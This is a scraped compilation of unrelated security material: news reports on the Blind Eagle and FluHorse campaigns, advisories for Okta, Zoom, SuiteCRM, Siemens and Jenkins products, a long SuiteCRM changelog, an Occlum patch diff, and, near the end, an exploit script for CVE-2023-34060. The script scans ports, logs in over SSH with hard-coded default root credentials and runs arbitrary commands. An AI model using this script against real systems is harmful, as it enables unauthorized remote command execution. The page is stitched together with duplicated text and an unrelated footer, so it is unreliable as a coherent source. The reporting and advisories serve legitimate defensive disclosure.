A financially motivated threat actor tracked as Blind Eagle has resurfaced with a refined toolset and an elaborate infection chain as part of its attacks targeting organizations in Colombia and Ecuador.
Check Point's latest research offers new insights into the Spanish-speaking group's tactics and techniques, including the use of sophisticated tools and government-themed lures to activate the

A financially motivated threat actor tracked as **Blind Eagle** has resurfaced with a refined toolset and an elaborate infection chain as part of its attacks targeting organizations in Colombia and Ecuador.

Check Point's latest research offers new insights into the Spanish-speaking group's tactics and techniques, including the use of sophisticated tools and government-themed lures to activate the killchain.

Also tracked under the name APT-C-36, Blind Eagle is notable for its narrow geographical focus and launching indiscriminate attacks against South American nations since at least 2018.

Blind Eagle's operations have been documented by Trend Micro in September 2021, uncovering a spear-phishing campaign primarily aimed at Colombian entities designed to deliver a commodity malware known as BitRAT, with a lesser focus towards targets in Ecuador, Spain, and Panama.

Attacks chains commence with phishing emails containing a booby-trapped link that, when clicked, leads to the deployment of an open source trojan named Quasar RAT with the ultimate goal of gaining access to the victim's bank accounts.

Some of targeted banks consists of Banco AV Villas, Banco Caja Social, Banco de Bogotá, Banco Popular, Bancoomeva, BBVA, Colpatria, Davivienda, and TransUnion.

Should the email recipient be located outside of Colombia, the attack sequence is aborted and the victim is redirected to the official website of the Colombian border control agency, Migración Colombia.

A related campaign singling out both Colombia and Ecuador masquerades as the latter's Internal Revenue Service (SRI) and makes use of a similar geo-blocking technology to filter out requests originating from other countries.

This attack, rather than dropping a RAT malware, employs a more complex multi-stage process that abuses the legitimate mshta.exe binary to execute VBScript embedded inside an HTML file to ultimately download two Python scripts.

The first of the two, ByAV2.py, is an in-memory loader engineered to run a Meterpreter payload in DLL format. mp.py is also a Meterpreter artifact, only it's programmed in Python, indicating that the threat actor could be using one of them as a redundant method to retain backdoor access to the host.

"Blind Eagle is a strange bird among APT groups," the researchers concluded. "Judging by its toolset and usual operations, it is clearly more interested in cybercrime and monetary gain than in espionage."

The development comes days after Qualys disclosed that an unknown adversary is leveraging personal information stolen from a Colombian cooperative bank to craft phishing emails that result in the deployment of BitRAT.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Blind Eagle Hackers Return with Refined Tools and Sophisticated Infection Chain

Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called FluHorse that abuses the Flutter software development framework.
"The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in

Mobile Security / Android

Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called **FluHorse** that abuses the Flutter software development framework.

"The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report. "These malicious apps steal the victims' credentials and two-factor authentication (2FA) codes."

The malicious apps have been found to imitate apps like ETC and VPBank Neo, which are used in Taiwan and Vietnam. Evidence gathered so far shows that the activity has been active since at least May 2022.

The phishing scheme in itself is fairly straightforward, wherein victims are lured with emails that contain links to a bogus website that hosts malicious APK files. Also added to the website are checks that aim to screen victims and deliver the app only if their browser User-Agent string matches that of Android.

Once installed, the malware requests for SMS permissions and prompts the user to input their credentials and credit card information, all of which is subsequently exfiltrated to a remote server in the background while the victim is asked to wait for several minutes.

The threat actors also abuse their access to SMS messages to intercept all incoming 2FA codes and redirect them to the command-and-control server.

The Israeli cybersecurity firm said it also identified a dating app that redirected Chinese-speaking users to rogue landing pages that are designed to capture credit card information.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

Interestingly, the malicious functionality is implemented with Flutter, an open source UI software development kit that can be used to develop cross-platform apps from a single codebase.

While threat actors are known to use a variety of tricks like evasion techniques, obfuscation, and long delays before execution to resist analysis and get around virtual environments, the use of Flutter marks a new level of sophistication.

"The malware developers did not put much effort into the programming, instead relying on Flutter as a developing platform," the researchers concluded.

"This approach allowed them to create dangerous and mostly undetected malicious applications. One of the benefits of using Flutter is that its hard-to-analyze nature renders many contemporary security solutions worthless."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Android Malware 'FluHorse' Targeting East Asian Markets with Deceptive Tactics

Okta Advanced Server Access Client for Windows prior to version 1.57.0 was found to be vulnerable to command injection via a specially crafted URL.

**Description**

Okta Advanced Server Access Client for Windows prior to version 1.57.0 was found to be vulnerable to command injection via a specially crafted URL.

**Affected product and versions**

Okta Advanced Server Access Client for Windows prior to version 1.57.0.

**Resolution**

The vulnerability is fixed in Okta Advanced Server Access Client for Windows version 1.57.0. To remediate this vulnerability, upgrade Okta Advanced Server Access Client for Windows.

**CVE details**

CVE ID

Published Date

February 17, 2022

Vulnerability Type

Remote Code Execution

CWE

CWE-94

CVSS v3

Score:8.1

Vector string:AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

**Acknowledgements**

Okta would like to thank their partner Recurity Labs for assistance on this finding.

Okta’s priority is always platform security and customer trust. Okta’s vulnerability management program uses a variety of methods to identify and fix security issues. When we score vulnerabilities we leverage the CVSS version 3.1 framework.

**Legal Disclaimer:**

The information provided in Okta’s Security Advisories is provided "as is" without warranty of any kind. Okta disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Okta or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Okta or its suppliers have been advised of the possibility of such damages. The foregoing exclusions will not apply to the extent prohibited by applicable law.

CVE-2022-24295: Okta Advanced Server Access Client CVE-2022-24295

All versions of the Zoom Plugin for Microsoft Outlook for MacOS before 5.3.52553.0918 contain a Time-of-check Time-of-use (TOC/TOU) vulnerability during the plugin installation process. This could allow a standard user to write their own malicious application to the plugin directory, allowing the malicious application to execute in a privileged context.

CVE-2021-34413: Security Bulletin

SuiteCRM through 7.11.21 is vulnerable to CSRF, with resultant remote code execution, via the UpgradeWizard functionality, if a PHP file is included in a ZIP archive.

*   PR: 7198 - Add Robo API commands
    
*   PR: 5464 - Filter email templates on Events
    
*   PR: 7829 - Issue: 7828 - Robo tasks for common actions that are performed in Repair Administration module
    
*   PR: 7819 - Issue: 7817 - Added option to filter WorkFlows by module name
    
*   PR: 7809 - Robo: Add a --filter option to tests:unit for filtering tests
    
*   PR: 7808 - Issue: 7621 - Add support for config\_override.test.php
    
*   PR: 7844 - SuiteP: Add html data tags to allow module and field identification
    
*   PR: 7837 - Issue: 7836 - Robo task to compile css in a custom theme
    
*   PR: 7834 - Workflow: Properly delete records which are marked as deleted
    

*   PR: 8154 - Issue: 8153 - SQL query in the ACLAction code
    
*   PR: 8151 - Resolve issue with email templates
    
*   PR: 7659 - Icons not rendering properly in Alerts
    
*   PR: 7655 - Issue: 7648 - Case Module: Description field not showing after Save and continue
    
*   PR: 7650 - 'customMetadate' typo in DashletGeneric.php
    
*   PR: 7643 - Issue: 7622 - Make the code:coverage Robo command work outside of CI
    
*   PR: 7641 - Issue: 7396 - Update button clears DateTime parameter in Reports Module
    
*   PR: 7638 - Issue: 7315 - Adding parameter date field in Reports module causes error in Browser console
    
*   PR: 7627 - Update sugar\_3.js to fix a MassUpdate undefined error
    
*   PR: 7587 - Issue: 7586 - Unnecessary include in UserService
    
*   PR: 7529 - Codacy
    
*   PR: 7525 - API Create Relationship via Link
    
*   PR: 7515 - Scheduled Reports: Fix report name relation and popup search
    
*   PR: 7428 - Issue: 7427 - Show logs lines that was made by anonymous
    
*   PR: 7195 - Inspections compatibility
    
*   PR: 7193 - Remove Unused Import
    
*   PR: 7141 - Type casting
    
*   PR: 6765 - Issue: 321 - Hitting enter in the password input saves the user but not the password
    
*   PR: 6503 - Add a SAML2 metadata endpoint
    
*   PR: 5537 - Issue: 5520 - Do not clear existing attachments when loading a template
    
*   PR: 4471 - Update DeleteRelationship.php
    
*   PR: 3820 - search\_by\_module REST API
    
*   PR: 7826 - Issue: 2825 - Now we translate the title tag for recently viewed links
    
*   PR: 7822 - Issue: 7821 - User name is not aligned in 1200px to 1600px screens
    
*   PR: 7818 - InboundEmailTest: Make tests independent to make them work with the state checker
    
*   PR: 7816 - Removing an item from subpanel should only require the item edit access right
    
*   PR: 7815 - Save email addresses before saving company/person
    
*   PR: 7814 - SQL query bug for quote purchase subpanel
    
*   PR: 7813 - Issue: 7810 - Pencil present in Top Menu for users with non editing permission
    
*   PR: 7802 - Issue: 6830 - Code coverage as a separate stage in CI
    
*   PR: 7797 - Issue: 7779 - PHP Fatal error in modules/Connectors
    
*   PR: 7783 - Issue: 7780 - Bad css format in Date and Date Range Inputs in search forms
    
*   PR: 7782 - Issue: 7781 - Now we can compile SuiteP only one color\_scheme
    
*   PR: 7777 - Issue: 7784 - Grouping by with xxx\_usdollar currency fields
    
*   PR: 7774 - EmailMarketing: Add security groups support
    
*   PR: 7773 - Make robo test commands fail if tests fail
    
*   PR: 7771 - Issue: 7620 - Add dotenv support for the test environment
    
*   PR: 7762 - Issue: 7761 - htaccess issue
    
*   PR: 7760 - SugarEmail: Fix 'to' field not being filled when the last record doesn’t have an email
    
*   PR: 7746 - Issue: 7675 - Add a function to compare properly indices definitions
    
*   PR: 7741 - Clean up a bunch of unit tests
    
*   PR: 7711 - Issue: 2928 - Clear Zend OPcache when writing files
    
*   PR: 7690 - Composerify Zend Lucene
    
*   PR: 7906 - Update Gitattributes + codeception.dist.yml
    
*   PR: 7904 - Issue: 7903 - Verify if $bean is\_subclass\_of SugarBean so we can check access
    
*   PR: 7900 - Issue: 7869 - Protect against illegal string offset warnings in aow\_utils
    
*   PR: 7899 - Issue: 7868 - 'Undefined index: leads\_id' notices in AOR\_Report.php
    
*   PR: 7898 - Issue: 7552 - AOR Reports - Mysqli\_query failed when execute Report as normal User
    
*   PR: 7892 - Issue: 5652 - Ending spaces in language strings
    
*   PR: 7877 - Issue: 7875 - Wrong render in DateRangeInput using 'Between' Option
    
*   PR: 7871 - Issue: 7870 - Improvements in css for date\_input and labels in EditView
    
*   PR: 7865 - Refixed #7393 without breaking headers for non-pulldown fields
    
*   PR: 7866 - Issue: 6535 - Replace contact\_xxx in templates also for leads/prospects/users
    
*   PR: 7864 - Issue: 7642 - Replace Title with Job Title
    
*   PR: 7858 - Issue: 6442 - Fix Issue when importing non UTF-8 CSV file
    
*   PR: 7857 - Issue: 7848 - Temporarily revert PHP 5.5 from the Travis build
    
*   PR: 7855 - Issue: 7613 - Status/State usage causing translation errors
    
*   PR: 7853 - Issue: 7848 - Move the PHP 5.6 job to xenial
    
*   PR: 7847 - Issue: 6012 - Emails being sent from 'Root User'
    
*   PR: 7841 - Update issue 'Undefined index: docType' PHP notice PR templates to comment on how to include code
    
*   PR: 7839 - Issue: 7838 - 'Undefined index: docType' PHP notice
    
*   PR: 7833 - SugarFeed: Various fixes for 7.10.19/20 regressions
    
*   PR: 7965 - Issue: 7964 - Report Total Field formatting is inconsistent
    
*   PR: 7963 - Issue: 7962 - Sending emails with apostrophe in email address
    
*   PR: 7959 - Issue: 3860 - Fix typo in InboundEmail.php
    
*   PR: 7957 - Silent upgrade
    
*   PR: 7956 - Issue: 7955 - Admin blank screen post upgrade to 7.11.8
    
*   PR: 7952 - Update the .gitattributes export-ignore list
    
*   PR: 7951 - Issue: 6691 - Typo in key - LBL\_ORIGINAL\_MESSAGE\_SEPERATOR
    
*   PR: 7950 - Issue: 7926 - Do not divide by adjustment if it equals 0
    
*   PR: 7944 - Issue: 3129 - Use correct Business Hours field name for opening hours check
    
*   PR: 7943 - Issue: 7942 - Add bool to eligible fields for merging
    
*   PR: 7930 - Typos in audit template metadata
    
*   PR: 7929 - Issue: 7928 - Upgrade wizard recommends composer update instead of composer install
    
*   PR: 7925 - Enable Delete button in Actions menu
    
*   PR: 7924 - Issue: 7923 - Verify the variable is an array
    
*   PR: 7922 - Issue: 7880 - InboundEmail mime parser
    
*   PR: 7918 - Issue: 7917 - Issue with french translation
    
*   PR: 7913 - Issue: 7912 - Avoid PHP Notices in getVardefs() method
    
*   PR: 7910 - Issue: 7885 - Add a SECURITY.md to the repository
    
*   PR: 7909 - htaccess
    
*   PR: 8039 - Misc improvements to the acceptance tests
    
*   PR: 8032 - Issue: 3857 - Retain date properly when saving a stored query
    
*   PR: 8031 - Issue: 7758 - Disable Action menu has no effect on menus in subpanel
    
*   PR: 8030 - Issue: 7738 - Email Template selection in email module is not working in Edge/IE11
    
*   PR: 8029 - Updated mkdir calls to throw RuntimeExceptions
    
*   PR: 8028 - Issue: 7874 - Unable to use custom \_head.tpl file
    
*   PR: 8027 - Issue: 7882 - No 'Server response time' in SuiteP
    
*   PR: 8026 - Issue: 8025 - OAuth Keys Fixed a grammatical error in include/templates/Template.php OAuth2 Clients and Tokens icons are missing
    
*   PR: 8020 - Fixed a grammatical error in include/templates/Template.php
    
*   PR: 8018 - Move RebuildConfig.php from using XTemplate to using Smarty
    
*   PR: 8015 - Make the pagination buttons on DetailView pages links.
    
*   PR: 8010 - Skip cache building if custom class exists for dashlets
    
*   PR: 8009 - Update contributing.md
    
*   PR: 7998 - Issue: 7997 - Datetime field caching issue
    
*   PR: 7995 - Typos and made it grammatically better
    
*   PR: 7994 - Update config.yml to include 7.10.x branch
    
*   PR: 7990 - AOW\_WorkFlow: Delete all related beans when deleting a workflow
    
*   PR: 7989 - BeanFactory: Don’t return deleted beans from the cache
    
*   PR: 7986 - Updated LoggerManager to use @method + code cleanup
    
*   PR: 7981 - Issue: 5709 - Paths to milestone image
    
*   PR: 7978 - Issue: 7971 - Textarea in EditView overlaps other fields
    
*   PR: 7976 - Replace deprecated array index accessors
    
*   PR: 7970 - Issue: 7969 - Cannot call logger
    
*   PR: 7966 - Email css error
    
*   PR: 8086 - Link contributors badge to contributors insights
    
*   PR: 8076 - Issue: 8057 - Deprecated usage of join
    
*   PR: 8075 - Issue: 8057 - Misc PHP 7.4 deprecations
    
*   PR: 8073 - Issue: 8057 - Remove all uses of get\_magic\_quotes\_gpc
    
*   PR: 8068 - Issue: 7764 - Undefined index: server\_unique\_key
    
*   PR: 8067 - Added the deprecated lowercase v8 API to codecov ignore list
    
*   PR: 8064 - Issue: 8063 - Change isset() to !empty()
    
*   PR: 8061 - Issue: 6314 - Unused language strings in ver. 7.10.8
    
*   PR: 8060 - Issue: 7987 - Apache log
    
*   PR: 8059 - Added a check for SUGARCRM restrictions in htaccess
    
*   PR: 8058 - Issue: 8057 - Deprecated usages of implode
    
*   PR: 8056 - Issue: 7128 - Remove scheme to avoid mixed content error
    
*   PR: 8054 - Improve footer styling for new stats item
    
*   PR: 8051 - Issue: 7397 - Implement Refresh Token Grant
    
*   PR: 8050 - Issue: 8001 - Non-distinct person entries for each meeting/call invited to
    
*   PR: 8049 - Header cleanup
    
*   PR: 8041 - Remove BusinessCard-related code
    

*   PR: 8000 - More PHP 7.4 array accessor deprecations
    
*   PR: 6750 - Issue: 4754 - Remove PHP4 style constructors
    
*   PR: 8085 - Deprecated string concatenation
    
*   PR: 8080 - Replaced alias functions
    

_Special thanks to the following members for their contributions and participation in this release!_

To report any security issues please follow our Security Process and send them directly to us via email security@suitecrm.com

CVE-2021-41597: 7.10.x Releases

This advisory contains mitigations for an Improper Validation of Integrity Check Value vulnerability in the Siemens SCALANCE XM-400 and XR-500 industrial switches.

Siemens SCALANCE XM-400 and XR-500

A stored cross site scripting vulnerability in Jenkins Dependency Graph Viewer Plugin 0.13 and earlier allowed attackers able to configure jobs in Jenkins to inject arbitrary HTML and JavaScript in the plugin-provided web pages in Jenkins.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Caliper CI Plugin
*   Dependency Graph Viewer Plugin
*   Docker Plugin
*   Embeddable Build Status Plugin
*   Gogs Plugin
*   Mashup Portlets Plugin
*   Port Allocator Plugin

**Descriptions****CSRF vulnerability and missing permission check in Docker Plugin allowed capturing credentials**

**SECURITY-1010 / CVE-2019-10340 (CSRF), CVE-2019-10341 (permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: docker-plugin**  
**Description:**

Docker Plugin did not perform permission checks on a method implementing form validation. This allowed users with Overall/Read access to Jenkins to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this form validation method did not require POST requests, resulting in a cross-site request forgery vulnerability.

This form validation method now requires POST requests and Overall/Administer or Item/Configure permission, as appropriate.

**Users with Overall/Read access could enumerate credential IDs in Docker Plugin**

**SECURITY-1400 / CVE-2019-10342**  
**Severity (CVSS):** Medium  
**Affected plugin: docker-plugin**  
**Description:**

Docker Plugin provides a list of applicable credential IDs to allow users configuring the plugin to select the one to use.

This functionality did not correctly check permissions, allowing any user with Overall/Read permission to get a list of valid credentials IDs. Those could be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in this plugin now requires the appropriate permission, typically Overall/Administer or Item/Configure.

**Reflected XSS vulnerability in Embeddable Build Status Plugin**

**SECURITY-1419 / CVE-2019-10346**  
**Severity (CVSS):** Medium  
**Affected plugin: embeddable-build-status**  
**Description:**

Embeddable Build Status Plugin did not sanitize arguments provided in the query string, resulting in a reflected cross-site scripting vulnerability.

Arguments are now sanitized.

**Mashup Portlets Plugin stored credentials in plain text**

**SECURITY-775 / CVE-2019-10347**  
**Severity (CVSS):** Medium  
**Affected plugin: mashup-portlets-plugin**  
**Description:**

Mashup Portlets Plugin stored SonarQube credentials unencrypted on the Jenkins controller. These credentials could be viewed by users with access to the Jenkins controller file system.

Mashup Portlets Plugin now stores these credentials encrypted.

**Gogs Plugin stored credentials in plain text**

**SECURITY-1438 / CVE-2019-10348**  
**Severity (CVSS):** Medium  
**Affected plugin: gogs-webhook**  
**Description:**

Gogs Plugin stored credentials unencrypted in job config.xml files on the Jenkins controller. These credentials could be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

Gogs Plugin now stores credentials encrypted.

**Stored XSS vulnerability in Dependency Graph Viewer Plugin**

**SECURITY-1177 / CVE-2019-10349**  
**Severity (CVSS):** Medium  
**Affected plugin: depgraph-view**  
**Description:**

Dependency Graph Viewer Plugin does not correctly escape the Display Name value for jobs in Jenkins, resulting in a stored cross-site scripting vulnerability.

As of publication of this advisory, there is no fix.

**Port Allocator Plugin stores credentials in plain text**

**SECURITY-1441 / CVE-2019-10350**  
**Severity (CVSS):** Medium  
**Affected plugin: port-allocator**  
**Description:**

Port Allocator Plugin stores credentials unencrypted in job config.xml files on the Jenkins controller. These credentials can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Caliper CI Plugin stores credentials in plain text**

**SECURITY-1437 / CVE-2019-10351**  
**Severity (CVSS):** Medium  
**Affected plugin: caliper-ci**  
**Description:**

Caliper CI Plugin stores credentials unencrypted in job config.xml files on the Jenkins controller. These credentials can be viewed by users with Extended Read permission, or access to the Jenkins controller file system.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-775: Medium
*   SECURITY-1010: Medium
*   SECURITY-1177: Medium
*   SECURITY-1400: Medium
*   SECURITY-1419: Medium
*   SECURITY-1437: Medium
*   SECURITY-1438: Medium
*   SECURITY-1441: Medium

**Affected Versions**

*   **Caliper CI Plugin** up to and including 2.3
*   **Dependency Graph Viewer Plugin** up to and including 0.13
*   **Docker Plugin** up to and including 1.1.6
*   **Embeddable Build Status Plugin** up to and including 2.0.1
*   **Gogs Plugin** up to and including 1.0.14
*   **Mashup Portlets Plugin** up to and including 1.0.9
*   **Port Allocator Plugin** up to and including 1.8

**Fix**

*   **Docker Plugin** should be updated to version 1.1.7
*   **Embeddable Build Status Plugin** should be updated to version 2.0.2
*   **Gogs Plugin** should be updated to version 1.0.15
*   **Mashup Portlets Plugin** should be updated to version 1.1.0

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Caliper CI Plugin
*   Dependency Graph Viewer Plugin
*   Port Allocator Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **David Fiser of Trend Micro Nebula working with Trend Micro's Zero Day Initiative** for SECURITY-1437, SECURITY-1438, SECURITY-1441
*   **Dhiru Pandey** for SECURITY-1419
*   **Ishaq Mohammed (https://about.me/security-prince)** for SECURITY-1177
*   **Oleg Nenashev, CloudBees, Inc.** for SECURITY-1010

CVE-2019-10349: Jenkins Security Advisory 2019-07-11

A cross-site request forgery vulnerability in Jenkins Docker Plugin 1.1.6 and earlier in DockerAPI.DescriptorImpl#doTestConnection allowed users with Overall/Read access to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2019-10340: Jenkins Security Advisory 2019-07-11

The pointer-validation logic in util/mem_util.rs in Occlum before 0.26.0 for Intel SGX acts as a confused deputy that allows a local attacker to access unauthorized information via side-channel analysis.

@@ -48,9 +48,12 @@ pub mod from\_user { return\_errno!(EINVAL, "NULL address is invalid"); }  
// confirm that at least the fisrt byte of the string is from user check\_ptr(out\_ptr)?;  
let cstr \= unsafe { CStr::from\_ptr(out\_ptr) }; let cstring \= CString::from(cstr); if !is\_inside\_user\_space(out\_ptr as \*const u8, cstring.as\_bytes().len()) { if !is\_inside\_user\_space(out\_ptr as \*const u8, cstring.as\_bytes\_with\_nul().len()) { return\_errno!(EFAULT, "the whole buffer is not in the user space"); } Ok(cstring) @@ -127,11 +130,14 @@ pub mod from\_untrusted { return\_errno!(EINVAL, "NULL address is invalid"); }  
// confirm that at least the fisrt byte of the string is out side of enclave check\_ptr(out\_ptr)?;  
let cstr \= unsafe { CStr::from\_ptr(out\_ptr) }; let cstring \= CString::from(cstr); if !sgx\_trts::trts::rsgx\_raw\_is\_outside\_enclave( out\_ptr as \*const u8, cstring.as\_bytes().len(), cstring.as\_bytes\_with\_nul().len(), ) { return\_errno!(EFAULT, "the string is not outside enclave"); }

CVE-2021-44421: Check the buffer address before copy the data from the buffer · occlum/occlum@36918e4

VMware Cloud Director version 10.5 suffers from an authentication bypass vulnerability.

    # Exploit Title: [VMware Cloud Director | Bypass identity verification]# Google Dork: [non]# Date: [12/06/2023]# Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly)# Version: [10.5]# CVE : [CVE-2023-34060]import requestsimport paramikoimport subprocessimport socketimport argparseimport threading# Define a function to check if a port is opendef is_port_open(ip, port):    # Create a socket object    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)    # Set the timeout to 1 second    s.settimeout(1)    # Try to connect to the port    try:        s.connect((ip, port))        # The port is open        return True    except:        # The port is closed        return False    finally:        # Close the socket        s.close()# Define a function to exploit a vulnerable devicedef exploit_device(ip, port, username, password, command):    # Create a ssh client object    client = paramiko.SSHClient()    # Set the policy to accept any host key    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())    # Connect to the target using the credentials    client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False)    # Execute the command and get the output    stdin, stdout, stderr = client.exec_command(command)    # Print the output    print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}")    # Close the ssh connection    client.close()# Parse the arguments from the userparser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director")parser.add_argument("ip", help="The target IP address")parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check")parser.add_argument("-u", "--username", default="root", help="The username for ssh")parser.add_argument("-w", "--password", default="vmware", help="The password for ssh")parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices")args = parser.parse_args()# Loop through the ports and check for the vulnerabilityfor port in args.ports:    # Check if the port is open    if is_port_open(args.ip, port):        # The port is open, send a GET request to the port and check the status code        response = requests.get(f"http://{args.ip}:{port}")        if response.status_code == 200:            # The port is open and vulnerable            print(f"Port {port} is vulnerable to CVE-2023-34060")            # Create a thread to exploit the device            thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command))            # Start the thread            thread.start()        else:            # The port is open but not vulnerable            print(f"Port {port} is not vulnerable to CVE-2023-34060")    else:        # The port is closed        print(f"Port {port} is closed")

Search

lenovo warranty check/lookup | check warranty status | lenovo support us